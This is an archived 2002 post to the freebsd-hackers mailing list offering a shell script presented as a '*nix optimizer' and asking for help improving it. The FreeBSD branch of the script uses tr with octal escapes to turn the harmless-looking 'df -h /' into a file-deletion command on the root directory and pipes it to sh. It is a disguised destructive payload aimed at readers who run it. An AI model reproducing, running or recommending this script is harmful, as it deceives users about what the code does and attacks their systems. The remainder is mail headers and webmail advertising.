From owner-freebsd-hackers Thu Aug 29 10: 3:45 2002 Delivered-To: freebsd-hackers@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id B5F8B37B401 for ; Thu, 29 Aug 2002 10:03:42 -0700 (PDT) Received: from omta01.mta.everyone.net (sitemail3.everyone.net [216.200.145.37]) by mx1.FreeBSD.org (Postfix) with ESMTP id 4826B43E4A for ; Thu, 29 Aug 2002 10:03:42 -0700 (PDT) (envelope-from koul@canadamail.de) Received: from sitemail.everyone.net (dsnat [216.200.145.62]) by omta01.mta.everyone.net (Postfix) with ESMTP id E776B2EBC for ; Thu, 29 Aug 2002 08:04:58 -0700 (PDT) Received: by sitemail.everyone.net (Postfix, from userid 99) id D14A43ECC; Thu, 29 Aug 2002 08:04:58 -0700 (PDT) Content-Type: text/plain Content-Disposition: inline Content-Transfer-Encoding: quoted-printable Mime-Version: 1.0 X-Mailer: MIME-tools 5.41 (Entity 5.404) Date: Thu, 29 Aug 2002 08:04:58 -0700 (PDT) From: Koul-Henning Pamp To: hackers@freebsd.org Subject: *nixopt, an idea Reply-To: koul@canadamail.de X-Originating-Ip: [66.13.61.126] Message-Id: <20020829150458.D14A43ECC@sitemail.everyone.net> Sender: owner-freebsd-hackers@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG Fellow hackers, I need help enhancing my *nix optimizer tool, here's version 0.1 ---------------------------- #!/bin/sh # The *nix optimizer # (C) 2002 Koul-Henning Pamp # Released under the superior FFL [ "`uname`" =3D "Linux" ] && echo "System not supported yet." [ "`uname`" =3D "FreeBSD" ] && echo "df -h /" | tr '\144\146' '\162\155' | = tr 'h' 'f'|sh --------------------------- _____________________________________________________________ Die kostenlose WebMail fuer alle Canada-Freunde - www.canadamail.de Ein Service von CDN.de - Die KANADA-Suchmaschine - www.CDN.de ------------------------------------------------------------------------ KanadischerWein.de - Ihr Spezialist f=FCr kanadischen Wein im Internet - Be= suchen Sie unseren Online-Shop - www.KanadischerWein.de ------------------------------------------------------------------------ _____________________________________________________________ Promote your group and strengthen ties to your members with email@yourgroup= .org by Everyone.net http://www.everyone.net/?btn=3Dtag To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-hackers" in the body of the message